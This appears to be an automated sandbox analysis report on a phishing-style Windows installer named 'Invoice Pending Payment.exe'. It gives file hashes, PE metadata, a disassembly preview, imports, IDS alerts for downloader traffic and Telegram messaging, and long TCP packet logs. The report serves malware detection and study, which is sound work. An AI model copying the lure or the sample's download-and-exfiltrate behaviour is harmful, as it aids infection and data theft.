SSDEEP:	6:2/r0IwOQPFeBmRaaBO/XJLgDj/GZowKblJBQVAL6Ab9xu+b1:2A9OQYYJO/XuGZjKJJiVu6AbT5R
MD5:	6620E9C5C35F1FEAAFC525A49FF31080
SHA1:	969AB64F04BCDCAB9088F1F2FA6A8209DB33E8FD
SHA-256:	FCD285BFF12244DA3CF356243BEACEB8DB8B2868320D371D1059408AD02A0CAA
SHA-512:	A3238FD4843C3407CD07C014444F2557D7064F53A074F58BE97230A7CC7D81E0C7D09DD25B9110C5568466E2F9AA10EB11129ED143E07F63763EB5FE3DA75ED9
Malicious:	false
Preview:	[PALEOMAGNETISM CLADOCEROUS]..praseodymium undeftly vestenvindes.Nskesedlers forgrundsfarves spandaueren skrmmevaabnets....;toyos oddesund apostrofe fremfrelses.Opsamlingsbeholdere alkoholdebut unadvertised suggestioneres overprovide......[FJORTENAARSFDSELSDAGES UDSTDELSERNES]..

C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\sensible.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice Pending Payment.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 424x693, components 3
Category:	dropped
Size (bytes):	32639
Entropy (8bit):	7.9475019669336495
Encrypted:	false
SSDEEP:	768:6+UnjpGM4h/Q0kf7jWCXOi/vWYjc/Gv33xxMatfqxi/fftvoEP:6+UjpB4K0kjjWKOi/vWYjOUHXtfqAXvP
MD5:	86647E5BC7C82F155C5CB0EC05F40E9F
SHA1:	E0946F26733AA05FCEAE067377622C083AF88C8D
SHA-256:	6D1974E15C49647F2BA907D7D233CB04D2F9D9C77CFB6B4255B577FE95D54B19
SHA-512:	7C812D119382C9135195DDD18106FC6B465982D36C7815680C52DE2C0A40DC8E569FFBF32E87AF8BA10A71670A01CAB30D0D36CE49DB599473EC10CDACEFF992
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........H.O..,Q.1..x...t.S.:P8<S...Hb.M(...t..x.R..........4.(..\....J^{R.....N....H...c.>..l.(f.@.u..$&$.U.Q.8..Lt..I..L.%ii...m..N..........R.sU..Ez..L..<S.q.V..s...=..)2^....0.<6{T.8..?.p.Tc..NOZ....?<sP.....O....H....j }..G. '\dsN.....H.}MIC..=...ii.....(.{.....Z..t4.(.v}...n....1E<c.z@8.v2i..8......zR......i......m...q.!.(?.?g.....M..t...E+

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.58580269013346
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Invoice Pending Payment.exe
File size:	507'280 bytes
MD5:	e70e71a31781b44f850a39693784ce74
SHA1:	ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
SHA256:	a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
SHA512:	2a7994cec6638f7ff523358e7df0bfddad0f2abaef89e598455e9f0b7a44009e139ac9f9afd7ac38377ed302727c5c75322327b8fabf0b450835cdbb5c52a9a8
SSDEEP:	12288:yQeEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2J/JSJFJ8JjJcJHJQJoXJSJAhwjJTJZx:cEJFJYJbJPeJyxJxWJiJfJcJWJSJaJ2p
TLSH:	33B4F1A37286E5E7F4560CF4CC299AF993A2ED01D9D85503F184BF2F387366245250AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....f.R.................\...........0.......p....@

File Icon


Icon Hash:	371f9d96cb0d1703

Static PE Info

General

Entrypoint:	0x4030b8
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66A9 [Wed Dec 25 05:01:29 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e160ef8e55bb9d162da4e266afd9eef3

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	06/05/2024 11:26:53 06/05/2025 11:26:53
Subject Chain	CN=Breweries, E=Skrmblomstede@Tredjeprmier.Sh, O=Breweries, L=Somersworth, OU="Tyktarmsoperations Kaalhoved tilblivelsens ", S=New Hampshire, C=US
Version:	3
Thumbprint MD5:	92807D7374421D79A823FA7ACA6FF4C6
Thumbprint SHA-1:	05F5583BAAEA1B3C4E6C4B87EF108D1468F3E327
Thumbprint SHA-256:	E8C65A4CB80B655AEF4C0D07A3D407B6265C0EC80F62EE79AC5291A245D3AEA2
Serial:	391A08F4CFA8FACE743EC806DF49200A45DD1E7D

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000008h
mov dword ptr [00423778h], eax
call 00007F9080ECD04Ah
mov dword ptr [004236C4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041EC80h
call dword ptr [00407164h]
push 00409180h
push 00422EC0h
call 00007F9080ECCCF4h
call dword ptr [00407120h]
mov ebp, 00429000h
push eax
push ebp
call 00007F9080ECCCE2h
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [004236C0h], eax
mov eax, ebp
jne 00007F9080ECA2BCh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F9080ECC772h
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F9080ECA375h
cmp cl, 00000020h
jne 00007F9080ECA2B8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F9080ECA2ACh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0x18a50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7b610	0x780
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5a6a	0x5c00	8781c451557a4626018483faabe438d0	False	0.6614724864130435	data	6.417713695663469	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	640f709ec19b4ed0455a4c64e5934d5e	False	0.4520399305555556	OpenPGP Secret Key	5.23558258677739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7b8	0x400	c9a433d4fe67308d6a5942cfb667cbe7	False	0.5986328125	data	4.862130355383113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x12000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x36000	0x18a50	0x18c00	ae1da6d52c6b9db5a72bcee2295c6945	False	0.3393604008838384	data	4.6330392279203245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x36448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.2523660238968414
RT_ICON	0x46c70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.4220954356846473
RT_ICON	0x49218	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	United States	0.49343339587242024
RT_ICON	0x4a2c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	United States	0.5876865671641791
RT_ICON	0x4b168	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5450819672131147
RT_ICON	0x4baf0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	United States	0.7319494584837545
RT_ICON	0x4c398	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	English	United States	0.7811059907834101
RT_ICON	0x4ca60	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 0	English	United States	0.47804878048780486
RT_ICON	0x4d0c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	United States	0.7095375722543352
RT_ICON	0x4d630	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.6879432624113475
RT_ICON	0x4da98	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	United States	0.5551075268817204
RT_ICON	0x4dd80	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 0	English	United States	0.6086065573770492
RT_ICON	0x4df68	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	United States	0.6993243243243243
RT_DIALOG	0x4e090	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4e190	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4e2b0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4e378	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x4e3d8	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x4e498	0x2b0	data	English	United States	0.5058139534883721
RT_MANIFEST	0x4e748	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Version Infos

Description	Data
Comments	forskningslederen phon
CompanyName	influenzaepidemiens doktoren
FileVersion	2.4.0.0
InternalName	nadvergst.exe
LegalCopyright	bimahs weensier spildevandsledningernes
LegalTrademarks	intensiveringernes
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-02-24T17:24:11.156612+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49737	142.250.186.46	443	TCP
2025-02-24T17:24:16.343542+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	158.101.44.242	80	TCP
2025-02-24T17:24:17.452898+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49741	158.101.44.242	80	TCP
2025-02-24T17:24:18.091399+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49756	104.21.32.1	443	TCP
2025-02-24T17:24:18.812277+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49759	158.101.44.242	80	TCP
2025-02-24T17:24:20.202977+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49771	158.101.44.242	80	TCP
2025-02-24T17:24:20.791092+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49777	104.21.32.1	443	TCP
2025-02-24T17:24:22.016880+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49784	104.21.32.1	443	TCP
2025-02-24T17:24:25.936989+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49815	104.21.32.1	443	TCP
2025-02-24T17:24:27.221526+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49822	104.21.32.1	443	TCP
2025-02-24T17:24:28.167476+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49828	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2025 17:24:10.080338955 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.080399990 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.080468893 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.138808966 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.138864994 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.781915903 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.782023907 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.782989025 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.783068895 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.846456051 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.846492052 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.847455978 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:10.847527981 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.850744009 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:10.891377926 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:11.156618118 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:11.159080029 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:11.159116030 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:11.159245968 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:11.159399033 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:11.159491062 CET	443	49737	142.250.186.46	192.168.2.4
Feb 24, 2025 17:24:11.159770966 CET	49737	443	192.168.2.4	142.250.186.46
Feb 24, 2025 17:24:11.375334024 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:11.375369072 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:11.375730038 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:11.380115986 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:11.380130053 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:12.031922102 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:12.032038927 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:12.036314011 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:12.036326885 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:12.036808014 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:12.036876917 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:12.037249088 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:12.079345942 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.650444984 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.650526047 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.651032925 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.651092052 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.665189981 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.665271997 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.665293932 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.665337086 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.738888979 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.738956928 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.739015102 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.739067078 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.739093065 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.739139080 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.739507914 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.739559889 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.739598989 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.739650011 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.746112108 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.746195078 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.746285915 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.746340990 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.752053022 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.752115011 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.752262115 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.752321959 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.758404016 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.758457899 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.758477926 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.758523941 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.765340090 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.765438080 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.765458107 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.765503883 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.770777941 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.770837069 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.770858049 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.770931959 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.776101112 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.776160002 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.776176929 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.776221991 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.781788111 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.781843901 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.781945944 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.782004118 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.787863016 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.787928104 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.787939072 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.788054943 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.793638945 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.793749094 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.793760061 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.793806076 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.799279928 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.799345970 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.828113079 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.828180075 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.828198910 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.828238010 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.828268051 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.828315973 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.828336954 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.828380108 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.828478098 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.828526974 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.829230070 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.829279900 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.829307079 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.829363108 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.832034111 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.832092047 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.832104921 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.832143068 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.837598085 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.837657928 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.837871075 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.837922096 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.843221903 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.843271971 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.843301058 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.843347073 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.843393087 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.843432903 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.848997116 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.849042892 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.849123955 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.849200010 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.854724884 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.854778051 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.854798079 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.854840994 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.860498905 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.860551119 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.860572100 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.860611916 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.865493059 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.865545988 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.865592957 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.865633965 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.872020006 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.872071981 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.872102022 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.872148991 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.877516031 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.877573967 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.877588987 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.877629042 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.882400990 CET	443	49738	142.250.181.225	192.168.2.4
Feb 24, 2025 17:24:14.882452011 CET	49738	443	192.168.2.4	142.250.181.225
Feb 24, 2025 17:24:14.882474899 CET	443	49738	142.250.181.225	192.168.2.4
